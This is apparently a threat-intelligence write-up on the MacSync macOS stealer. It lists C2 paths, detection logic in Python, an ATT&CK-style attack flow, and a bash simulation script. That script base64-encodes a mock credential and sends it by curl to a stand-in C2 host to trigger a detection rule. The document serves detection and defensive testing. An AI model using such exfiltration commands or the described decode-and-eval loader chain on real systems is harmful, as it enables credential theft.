SOC Prime Bias: Medium

12 May 2026 18:31

MacSync Stealer Uses Rotating C2 Infrastructure

SOC Prime Team

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

MacSync Stealer is a macOS information-stealing malware offered through a malware-as-a-service model. It relies on a multi-stage zsh loader that reaches out to a rotating pool of command-and-control domains to exfiltrate stolen information, including passwords and cryptocurrency wallet credentials. The loader transmits clear-text passwords through a query-string parameter and uploads a ZIP archive of collected data in 10 MiB chunks. Its infrastructure rotation strategy depends on a static API key reused across several domains together with a per-build hexadecimal token.

Investigation

RST Cloud detected a download attempt from the newly registered domain jacksonvillemma.com and captured the Stage 2 zsh loader within an hour. Static analysis exposed the loader’s token, API key, and command-and-control path trio: /curl, /dynamic, and /gate. Additional pivoting based on those URI patterns revealed a cluster of roughly twelve suspected command-and-control domains active between February and May 2026. Four of those domains were confirmed to share the same API key, while the others were linked through matching URI behavior alone.

Mitigation

Defenders should block all known MacSync command-and-control domains and monitor for the distinct URL path patterns used by the malware. Proxy and DNS logs should be reviewed for requests containing /curl, /dynamic, and /gate, as well as for the shortened Chrome-like macOS user-agent string tied to the loader. Security teams should also detect creation of /tmp/osalogging.zip and watch for zsh processes that execute base64 -D, gunzip, and eval in combination.
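The three detection checks described in this section, written out as an added Python example (this is not SOC Prime's own detection content): one rule flags proxy requests whose path is exactly /curl, /dynamic or /gate and escalates when a cleartext pwd= query parameter is present, one flags a zsh process whose command line chains base64 -D, gunzip and eval, and one flags creation of /tmp/osalogging.zip. The proxy log layout, the event field names and the host names in the sample telemetry are constructed assumptions, not real indicators.

```python
import os
import re
from dataclasses import dataclass
from typing import Optional
from urllib.parse import parse_qs, urlsplit

# Indicators from the write-up: the C2 path trio, the staging archive and the
# loader's decode-and-eval chain. Everything else below is an assumption.
C2_PATHS = {"/curl", "/dynamic", "/gate"}
STAGING_ARCHIVE = "/tmp/osalogging.zip"
LOADER_TOKENS = ("base64 -D", "gunzip", "eval")

# Constructed proxy log layout (assumed, not a real product format):
#   <timestamp> <client_ip> <method> <url> <status> "<user_agent>"
PROXY_LINE_RE = re.compile(
    r'^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) (?P<url>\S+) '
    r'(?P<status>\d{3}) "(?P<ua>[^"]*)"$'
)


@dataclass(frozen=True)
class Finding:
    rule: str       # short rule name
    severity: str   # "high" or "medium"
    evidence: str   # the log fragment that matched


def check_proxy_line(line: str) -> Optional[Finding]:
    """Flag requests to the C2 paths; escalate when a cleartext pwd= parameter is present."""
    m = PROXY_LINE_RE.match(line.strip())
    if not m:
        return None
    parts = urlsplit(m["url"])
    # Exact path match: a legitimate '/curl-tutorial' page must not fire.
    if parts.path not in C2_PATHS:
        return None
    query = parse_qs(parts.query, keep_blank_values=True)
    evidence = f"{m['src']} -> {m['url']}"
    if "pwd" in query:
        return Finding("macsync_c2_cleartext_password", "high", evidence)
    return Finding("macsync_c2_path", "medium", evidence)


def check_process_event(event: dict) -> Optional[Finding]:
    """Flag a zsh process whose command line combines base64 -D, gunzip and eval."""
    if os.path.basename(event.get("process", "")) != "zsh":
        return None
    cmdline = event.get("cmdline", "")
    if all(token in cmdline for token in LOADER_TOKENS):
        return Finding("macsync_zsh_loader_chain", "high", cmdline)
    return None


def check_file_event(event: dict) -> Optional[Finding]:
    """Flag creation of the archive the loader stages before exfiltration."""
    if event.get("action") == "create" and event.get("path") == STAGING_ARCHIVE:
        return Finding("macsync_staging_archive", "high", event["path"])
    return None


def scan(proxy_lines, process_events, file_events) -> list:
    """Run all three rules and return the findings in rule order."""
    findings = [f for f in map(check_proxy_line, proxy_lines) if f]
    findings += [f for f in map(check_process_event, process_events) if f]
    findings += [f for f in map(check_file_event, file_events) if f]
    return findings


# Constructed sample telemetry; host names are placeholders, not real indicators.
SAMPLE_PROXY_LOG = [
    '2026-05-12T18:31:00Z 10.0.0.5 GET https://c2-placeholder.invalid/dynamic?txd=5f3a9c&pwd=hunter2 200 "Mozilla/5.0 (Macintosh; Intel Mac OS X)"',
    '2026-05-12T18:31:05Z 10.0.0.5 POST https://c2-placeholder.invalid/gate?txd=5f3a9c 200 "Mozilla/5.0 (Macintosh; Intel Mac OS X)"',
    '2026-05-12T18:31:07Z 10.0.0.6 GET https://www.example.com/curl-tutorial 200 "Mozilla/5.0"',
    '2026-05-12T18:31:09Z 10.0.0.6 GET https://www.example.com/index.html 200 "Mozilla/5.0"',
]
SAMPLE_PROCESS_EVENTS = [
    {"process": "/bin/zsh", "cmdline": 'zsh -c eval "$(echo QUJD | base64 -D | gunzip)"'},
    {"process": "/bin/zsh", "cmdline": "zsh -c cat payload.b64 | base64 -D > payload.bin"},
    {"process": "/bin/bash", "cmdline": 'bash -c eval "$(gunzip -c x.gz)"'},
]
SAMPLE_FILE_EVENTS = [
    {"action": "create", "path": "/tmp/osalogging.zip"},
    {"action": "create", "path": "/tmp/report.zip"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_PROXY_LOG, SAMPLE_PROCESS_EVENTS, SAMPLE_FILE_EVENTS):
        print(f"[{f.severity}] {f.rule}: {f.evidence}")
```

Run against the sample telemetry, the block yields four findings: the /dynamic request with the pwd= parameter, the /gate request, the decode-and-eval zsh command line, and the staging archive. The /curl-tutorial request, the zsh line that only decodes base64, and the bash eval do not fire, which is the point of matching the full path and the full token combination rather than a single substring.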

Response

If a matching indicator is found, isolate the affected endpoint immediately, terminate the malicious zsh process, and collect memory for analysis of any AppleScript payloads. Reset exposed user passwords and invalidate compromised credentials stored in the macOS keychain. Detection logic should also be updated with the observed token, API key, and user-agent patterns to reduce the risk of future compromise.

Attack Flow

    graph TB
        %% Class definitions
        classDef action fill:#99ccff
        classDef tool fill:#ffcc99
        classDef file fill:#cccccc
        classDef process fill:#ccffcc

        %% Nodes
        initial_access_phishing["<b>Technique</b> – T1566 Phishing<br/><b>Description</b>: Malvertising delivers a script that runs curl to fetch the Stage 2 Zsh loader from a C2 domain."]
        class initial_access_phishing action
        tool_curl["<b>Tool</b> – curl<br/><b>Description</b>: Command-line utility used to download the Stage 2 loader."]
        class tool_curl tool
        defense_obfuscate_compile["<b>Technique</b> – T1027.004 Compile After Delivery<br/><b>Description</b>: Zsh wrapper contains a base64-gzip payload that is decoded and executed with eval."]
        class defense_obfuscate_compile action
        defense_embedded_payload["<b>Technique</b> – T1027.009 Embedded Payloads<br/><b>Description</b>: Payload is embedded as a base64-encoded, gzip-compressed blob inside the wrapper."]
        class defense_embedded_payload action
        defense_stripped_payload["<b>Technique</b> – T1027.008 Stripped Payloads<br/><b>Description</b>: Wrapper is stripped of identifiable strings, relying on runtime decoding."]
        class defense_stripped_payload action
        defense_dynamic_api["<b>Technique</b> – T1027.007 Dynamic API Resolution<br/><b>Description</b>: HTTP requests include a static api-key header and a custom truncated User-Agent."]
        class defense_dynamic_api action
        execution_shared_modules["<b>Technique</b> – T1129 Shared Modules<br/><b>Description</b>: Decoded script is executed as a background Zsh function via eval."]
        class execution_shared_modules action
        process_zsh["<b>Process</b> – Zsh<br/><b>Description</b>: Shell used to run the decoded malicious function."]
        class process_zsh process
        cred_os_dumping["<b>Technique</b> – T1003 OS Credential Dumping<br/><b>Description</b>: AppleScript retrieved from C2 extracts macOS Keychain entries."]
        class cred_os_dumping action
        cred_browser["<b>Technique</b> – T1555.003 Credentials from Web Browsers<br/><b>Description</b>: Same AppleScript harvests stored credentials from Chromium browsers and crypto-wallet extensions."]
        class cred_browser action
        cred_unsecured_files["<b>Technique</b> – T1552.001 Unsecured Credentials in Files<br/><b>Description</b>: Harvested data written to /tmp/osalogging.zip before exfiltration."]
        class cred_unsecured_files action
        file_archive["<b>File</b> – /tmp/osalogging.zip<br/><b>Description</b>: Zip archive containing collected credentials."]
        class file_archive file
        collection_archive["<b>Technique</b> – T1560 Archive Collected Data<br/><b>Description</b>: Data compressed into a zip archive for staging."]
        class collection_archive action
        command_control_dynamic["<b>Technique</b> – T1568 Dynamic Resolution<br/><b>Description</b>: Malware contacts C2 using HTTP paths discovered via pattern matching."]
        class command_control_dynamic action
        cred_valid_accounts["<b>Technique</b> – T1078 Valid Accounts<br/><b>Description</b>: User macOS password sent in cleartext via “&pwd=” query parameter, giving attacker legitimate credentials."]
        class cred_valid_accounts action

        %% Connections
        initial_access_phishing -->|uses| tool_curl
        tool_curl -->|delivers| defense_obfuscate_compile
        defense_obfuscate_compile -->|includes| defense_embedded_payload
        defense_embedded_payload -->|includes| defense_stripped_payload
        defense_stripped_payload -->|uses| defense_dynamic_api
        defense_dynamic_api -->|enables| execution_shared_modules
        execution_shared_modules -->|executes| process_zsh
        process_zsh -->|runs| cred_os_dumping
        cred_os_dumping -->|runs| cred_browser
        cred_browser -->|writes to| cred_unsecured_files
        cred_unsecured_files -->|creates| file_archive
        file_archive -->|used by| collection_archive
        collection_archive -->|sent to| command_control_dynamic
        command_control_dynamic -->|provides| cred_valid_accounts

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.

  • Attack Narrative & Commands:
    An adversary has deployed the MacSync stealer binary onto a compromised macOS workstation. The stealer extracts the current user’s macOS keychain password, base64‑encodes it, and exfiltrates it via an HTTP GET request through the corporate proxy. The request targets the known C2 endpoint https://malicious.c2.net/dynamic?txd=<payload>. Because the proxy logs full URLs, the detection rule will see the dynamic?txd= substring and raise an alert.

  • Regression Test Script:

      #!/bin/bash
      # macsync_stealer_simulation.sh
      # Simulates MacSync stealer C2 communication to trigger the detection rule.
      set -euo pipefail

      PROXY="http://proxy.corp.local:3128"
      C2_URL="https://malicious.c2.net/dynamic"   # the rule keys on the "dynamic?txd=" substring
      USER_AGENT="Mozilla/5.0 (Macintosh; Intel Mac OS X 13_0) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Safari/605.1.15"

      # 1️⃣ Extract a mock password (for demo purposes use the current user name)
      PASSWORD="$(whoami):P@ssw0rd!"

      # 2️⃣ Encode the credential in base64 (emulates MacSync's encoding step);
      #    strip the trailing newline so it does not end up in the URL
      ENCODED=$(printf "%s" "$PASSWORD" | base64 | tr -d '\n')

      # 3️⃣ Construct the query parameter; curl -G --data-urlencode appends it as
      #    dynamic?txd=<payload> and URL-encodes the base64 characters + / =
      QUERY="txd=${ENCODED}"

      # 4️⃣ Send the request via the corporate proxy. A non-2xx answer or a proxy block
      #    page is expected and must not fail the test; only the URL the proxy logs matters.
      curl -sS -G -x "$PROXY" --max-time 15 -A "$USER_AGENT" --data-urlencode "$QUERY" \
          -o /dev/null -w 'Proxy returned HTTP %{http_code} for %{url_effective}\n' "$C2_URL" || true

      echo "Simulation executed – payload sent to ${C2_URL}?${QUERY}"

  • Cleanup Commands:

      # Remove any temporary files (none created) and optionally purge proxy cache
      echo "Cleaning up simulation artifacts..."
      # If using Squid, purge the exact URL that was requested. PURGE takes a single URL
      # (no wildcards) and the proxy must allow the PURGE method from this host.
      # Replace <payload> with the txd value printed by the simulation run.
      sudo squidclient -m PURGE "https://malicious.c2.net/dynamic?txd=<payload>"